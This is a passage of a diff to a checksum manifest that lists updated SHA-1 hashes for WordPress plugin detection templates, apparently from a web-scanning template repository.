+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:1abb8c2db0b2be269d5ff198fee5064e7cba9e18
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:924927777d59fef8a11d68dda86b4a14086ddfbd
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
-http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
+http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
